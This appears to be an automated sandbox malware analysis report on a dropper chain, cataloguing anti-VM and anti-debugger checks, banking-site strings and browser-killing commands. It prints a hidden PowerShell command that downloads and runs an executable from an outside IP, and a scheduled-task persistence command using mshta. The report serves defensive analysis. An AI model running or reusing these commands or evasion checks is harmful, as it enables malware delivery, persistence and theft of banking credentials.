Source: axplong.exe, 00000006.00000002.2725343639.0000000001689000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2725343639.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000002.3105970241.00000000055C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0f39a8c7db.exe, 0000000F.00000002.2538106333.00000000013EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareZz
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 8f4d1353d2.exe, 0000001A.00000002.2725226480.0000000001007000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareH^
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0xqfQZufeQ.exe, 00000000.00000003.1438533149.0000000001554000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 8f4d1353d2.exe, 0000001A.00000002.2725226480.0000000001007000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 382cd038a3.exe, 00000010.00000003.2230711410.0000000001997000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}40ba47a6ef32fa8dad2043978\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: axplong.exe, axplong.exe, 00000006.00000002.2720880945.0000000000F28000.00000040.00000001.01000000.00000007.sdmp, 0f39a8c7db.exe, 0f39a8c7db.exe, 00000008.00000002.2434901398.00000000004BF000.00000040.00000001.01000000.00000009.sdmp, 8166ff9922.exe, 00000009.00000002.2118030594.00000000005A3000.00000040.00000001.01000000.0000000A.sdmp, 8166ff9922.exe, 00000009.00000000.2052234242.00000000005A3000.00000080.00000001.01000000.0000000A.sdmp, 3f28c42ac4.exe, 0000000D.00000002.2720888126.00000000009A5000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000E.00000002.2723506401.0000000000253000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000000.2112170028.0000000000253000.00000080.00000001.01000000.0000000F.sdmp, 0f39a8c7db.exe, 0000000F.00000002.2529941094.00000000004BF000.00000040.00000001.01000000.00000009.sdmp, 382cd038a3.exe, 00000010.00000002.2351559829.000000000109F000.00000040.00000001.01000000.00000010.sdmp, 8166ff9922.exe, 00000016.00000002.2305581137.00000000005A3000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: a103019032.exe, 0000001B.00000003.2551480909.0000000001771000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2550591050.0000000001757000.00000004.00000020.00020000.00000000.sdmp, a103019032.exe, 0000001B.00000003.2552375371.0000000001783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 3f28c42ac4.exe, 0000000D.00000002.2736864441.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yb
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 382cd038a3.exe, 00000010.00000002.2355153485.0000000001B2F000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000003.2314171531.0000000001B2E000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000003.2313342842.0000000001B1F000.00000004.00000020.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000003.2313287232.0000000001B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 3f28c42ac4.exe, 0000000D.00000002.2736864441.0000000000E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 0xqfQZufeQ.exe, 00000000.00000002.1460731502.0000000000C58000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1491722061.0000000000F28000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2720880945.0000000000F28000.00000040.00000001.01000000.00000007.sdmp, 0f39a8c7db.exe, 00000008.00000002.2434901398.00000000004BF000.00000040.00000001.01000000.00000009.sdmp, 8166ff9922.exe, 00000009.00000002.2118030594.00000000005A3000.00000040.00000001.01000000.0000000A.sdmp, 8166ff9922.exe, 00000009.00000000.2052234242.00000000005A3000.00000080.00000001.01000000.0000000A.sdmp, 3f28c42ac4.exe, 0000000D.00000002.2720888126.00000000009A5000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000E.00000002.2723506401.0000000000253000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000000.2112170028.0000000000253000.00000080.00000001.01000000.0000000F.sdmp, 0f39a8c7db.exe, 0000000F.00000002.2529941094.00000000004BF000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 0000000E.00000002.2755208323.0000000000B52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Code function: 0_2_05460168 Start: 05460202 End: 054601F3

0_2_05460168

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Code function: 0_2_054607C6 rdtsc

0_2_054607C6

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4A5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

8_2_6C4A5FF0

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_6C4AC410

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D6645B mov eax, dword ptr fs:[00000030h]		6_2_00D6645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D6A1C2 mov eax, dword ptr fs:[00000030h]		6_2_00D6A1C2

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C47B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6C47B66C
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C47B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C47B1F7
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C62AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C62AC62

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3364.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3820.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8f4d1353d2.exe PID: 7728, type: MEMORYSTR

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe "C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe "C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe "C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe "C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe "C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C674760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

8_2_6C674760

Source: a103019032.exe, 0000001B.00000002.2558207070.0000000000EF2000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: axplong.exe, axplong.exe, 00000006.00000002.2720880945.0000000000F28000.00000040.00000001.01000000.00000007.sdmp, 0f39a8c7db.exe, 0f39a8c7db.exe, 00000008.00000002.2434901398.00000000004BF000.00000040.00000001.01000000.00000009.sdmp, 0f39a8c7db.exe, 0000000F.00000002.2529941094.00000000004BF000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Program Manager
Source: 382cd038a3.exe, 00000010.00000002.2352085674.00000000010E7000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: QProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00D4D312 cpuid

6_2_00D4D312

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
